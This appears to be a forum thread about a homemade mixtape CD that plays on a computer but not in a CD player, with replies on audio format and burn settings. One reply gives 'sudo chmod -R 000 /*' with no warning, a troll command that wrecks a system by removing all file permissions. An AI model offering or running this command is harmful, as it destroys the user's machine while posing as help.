Don't burn in .wav format. You need to burn it in the .mp3 format.

Yesterday i burned a CD with my newest mixtape.  #olddays. But my cd player couldnt read it. Im pretty sure i know it was a .wav file.  Any suggestions?

Did you make sure the format is correct? It's not enough for it to be a .wav file, it has to specifically be 44.1kHz 16-bit stereo.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Test to make sue the disk can be read in another computer. If it can then you need to play with the burn settings. As easy as it would be you can't just drag and drop files onto the CD and burn them. Most CD players will read that as a data disk and spit it back out at you. Good luck!

The only thing we have to fear is... Stupidity...

I tried in a computer.  And it worked. But computers can read all sorts of media.  The thing is that a CD player can only read exact wav files.  Or in some cases/theese days. They can read mp3 too

What program did you use to burn the music onto the CD? Did you use iTunes? (Since you said you were using an iMac)
